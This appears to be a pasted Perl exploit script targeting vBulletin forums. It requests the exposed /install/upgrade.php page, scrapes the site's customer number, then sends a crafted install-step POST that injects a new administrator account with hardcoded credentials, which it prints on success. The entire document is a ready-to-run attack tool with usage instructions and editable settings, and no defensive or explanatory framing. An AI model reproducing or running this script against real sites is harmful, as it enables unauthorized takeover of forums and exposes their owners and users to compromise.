hi

1. use strict;
2. use IO::Socket;
3.  
4. if(!defined($ARGV[0])) {
5.  
6. system ('clear');
7. print "\n";
8. print "===================================================\n";
9. print "--- vbulletin admin injection exploit\n";
10. print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
11. print "--- MorXploit Research www.MorXploit.com\n";
12. print "===================================================\n";
13.  
14. print "--- Usage: perl $0 target\n\n";
15. exit; }
16.  
17. my $site = $ARGV[0];
18.  
19. ##### Change these as needed #####
20. my $user = "MorXploit";
21. my $passwd = "m0rxpl017";
22. my $email = "dev%40null.com";
23. my $path = "/install/upgrade.php";
24. ##################################
25.  
26. my $accept = "Accept: */*";
27. my $ct = "application/x-www-form-urlencoded";
28. my $port = "80";
29.  
30. system ('clear');
31. print "\n";
32. print "===================================================\n";
33. print "--- vbulletin admin injection exploit\n";
34. print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
35. print "--- MorXploit Research www.MorXploit.com\n";
36. print "===================================================\n";
37.  
38. my $sock = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
39.  
40. print "[*] Trying to get customer number ... hold on!\n";
41.  
42. print $sock "GET $path HTTP/1.1\n";
43. print $sock "Host: $site\n";
44. print $sock "$accept\n";
45. print $sock "Content-Type: $ct\n";
46. print $sock "Connection: Close\n\n";
47.  
48. my $gotcn;
49. while(my $cn = <$sock>) {
50. if ($cn =~ /CUSTNUMBER = \"(.*?)\"/){
51. $gotcn = $1;
52. }
53. }
54.  
55. if (!defined $gotcn) {
56. print "[-] Failed to get customer number! Nulled? Going to try anyway!\n";
57. }
58. else {
59. print "[+] Got $gotcn!\n";
60. }
61. my $xploit = "ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0
62. &only=false&customerid=$gotcn&options[skiptemplatemerge]=0&response=yes&
63. htmlsubmit=1&htmldata[username]=$user&htmldata[password]=$passwd&htmldat
64. a[confirmpassword]=$passwd&htmldata[email]=$email";
65. my $cl = length($xploit);
66. my $content = "Content-Length: $cl";
67.  
68. my $sock2 = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
69.  
70. print "[*] Trying to MorXploit $site ... hold on!\n";
71.  
72. print $sock2 "POST $path HTTP/1.1\n";
73. print $sock2 "Host: $site\n";
74. print $sock2 "$accept\n";
75. print $sock2 "Cookie: bbcustomerid=$gotcn\n";
76. print $sock2 "Content-Length: $cl\n";
77. print $sock2 "Content-Type: $ct\n";
78. print $sock2 "Connection: Close\n\n";
79. print $sock2 "$xploit\n\n";
80.  
81. while(my $result = <$sock2>){
82. if ($result =~ /Administrator account created/) {
83. print "[+] Admin account successfully injected!\n";
84. print "[+] Admin: $user\n";
85. print "[+] Pass: $passwd\n";
86. exit;
87. }
88. }
89. print "[-] Failed, something went wrong\n";
90. exit;